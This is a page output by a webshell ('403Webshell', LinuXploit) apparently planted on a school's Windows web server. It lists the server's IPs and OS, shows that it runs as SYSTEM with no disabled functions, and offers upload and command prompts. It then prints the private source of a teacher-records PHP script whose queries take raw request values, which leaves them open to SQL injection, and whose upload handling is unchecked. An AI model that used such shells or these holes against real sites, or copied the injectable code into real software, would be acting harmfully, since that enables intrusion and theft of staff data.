403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/myschool/triamudom/check/webadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /Inetpub/www/myschool/triamudom/check/webadmin/function_teacher.php
<?php
session_start();
$path = "../";
include ($path.'include/config_db.php');
include ($path.'include/class_db.php'); 
include ($path.'include/class_display.php'); 
include ($path.'include/function.php'); 
include ($path.'include/permission_denied.php'); 
$CLASS['db']   = new db();
$CLASS['db']->connect(); 
$CLASS['disp']   = new display();
$db   = $CLASS['db']; 
$disp   = $CLASS['disp']; 
$date_day = date("Y-m-d").' '.date("H:i:s");  

$action = $_REQUEST['action'];
$tb_teacher_id = $_REQUEST['tb_teacher_id'];
$tb_teacher_code = $_REQUEST['tb_teacher_code'];
$tb_teacher_tname = $_REQUEST['tb_teacher_tname'];
$tb_teacher_name = $_REQUEST['tb_teacher_name'];
$tb_teacher_sname = $_REQUEST['tb_teacher_sname'];
$tb_teacher_degree = $_REQUEST['tb_teacher_degree'];
$tb_teacher_address = $_REQUEST['tb_teacher_address'];
$tb_teacher_phone = $_REQUEST['tb_teacher_phone'];
$tb_teacher_number = $_REQUEST['tb_teacher_number'];
$tb_teacher_position = $_REQUEST['tb_teacher_position'];
$tb_teacher_picture = $_FILES['tb_teacher_picture'];
$tb_teacher_picture_me = $_REQUEST['tb_teacher_picture_me'];
$tb_department_id = $_REQUEST['tb_department_id'];
$tb_academic_id = $_REQUEST['tb_academic_id'];

	if($tb_teacher_picture){
		$namefile1 = copyobject($tb_teacher_picture[size], $tb_teacher_picture[name], $tb_teacher_picture[tmp_name], "teacher_", "../id-plan/file_uploads/", "$tb_teacher_picture_me", "");
	}else{
		$namefile1 = $tb_teacher_picture_me;
	}

if($action=='save'){
	$sql_chk = "select * from tb_teachers where tb_teacher_number = '".$tb_teacher_number."' ";
	$result_chk = $db->query($sql_chk);
	$num_chk = $db->num_rows($result_chk);
	if($num_chk=='1'){
	print "
	<script language='javascript'>
		alert('Teacher Code Not Null');
		window.location.href='display_teacher_add.php';
	</script>
	";
	}else{
	$query_int = $db->query("INSERT INTO tb_teachers 
	(tb_teacher_id, 
	tb_teacher_name, 
	tb_teacher_position, 
	tb_teacher_number, 
	tb_teacher_type, 
	tb_teacher_date, 
	tb_teacher_degree, 
	tb_teacher_phone, 
	tb_department_id, 
	tb_academic_id, 
	tb_teacher_status,
	tb_teacher_picture
	)
	VALUES
	(NULL, 
	'".$tb_teacher_name."', 
	'".$tb_teacher_position."', 
	'".$tb_teacher_number."', 
	'".$tb_teacher_type."', 
	'".$date_day."', 
	'".$tb_teacher_degree."', 
	'".$tb_teacher_phone."', 
	'".$tb_department_id."', 
	'".$tb_academic_id."', 
	'1',
	'".$namefile1."'
	)");
	
	print "
	<script language='javascript'>
		window.location.href='display_teacher.php';
	</script>
	";
	}
}else{

	$query_up = $db->query("UPDATE tb_teachers 
	SET
	tb_teacher_name = '".$tb_teacher_name."' , 
	tb_teacher_position = '".$tb_teacher_position."' , 
	tb_teacher_number = '".$tb_teacher_number."' , 
	tb_teacher_date = '".$date_day."' , 
	tb_teacher_degree = '".$tb_teacher_degree."' , 
	tb_teacher_picture = '".$namefile1."' , 
	tb_department_id = '".$tb_department_id."' , 
	tb_academic_id = '".$tb_academic_id."' , 
	tb_teacher_phone = '".$tb_teacher_phone."' 
 where tb_teacher_id='".$tb_teacher_id."' ");
	print "
	<script language='javascript'>
		window.location.href='display_teacher.php';
	</script>
	";
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit